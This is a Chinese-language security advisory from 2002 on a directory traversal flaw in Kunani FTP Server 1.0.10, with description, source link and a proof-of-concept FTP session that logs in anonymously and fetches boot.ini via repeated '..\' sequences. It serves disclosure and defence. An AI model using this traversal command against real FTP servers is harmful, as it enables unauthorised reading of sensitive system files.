Kunani FTP远程目录遍历漏洞
发布日期:2002-12-10
更新日期:2002-12-16
受影响系统:Kunani Kunani FTP Server 1.0.10
描述:
BUGTRAQ ID:
6355
Kunani FTP是一款使用于Windows操作系统下的FTP服务程序。
Kunani FTP服务程序对用户的请求数据缺少充分过滤,远程攻击者可以利用这个漏洞进行目录遍历攻击。
攻击者可以提交参数中包含多个'../'字符的命令请求,可以绕过FTP ROOT目录限制,遍历系统目录,以FTP权限查看系统任意敏感文件。
<*来源:Zero-X www.lobnan.de Team (
zero-x@linuxmail.org)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103956177604196&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Zero-X www.lobnan.de Team (
zero-x@linuxmail.org)提供了如下测试方法:
######################################################
Verbindung mit server.
220 Kunani FTP Server Ready ( www.kunani.com )
Benutzer (server:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get ..\..\..\..\..\boot.ini
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
#####################################################
建议:
厂商补丁:
Kunani
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.kunani.com浏览次数:3696
严重程度:0(网友投票)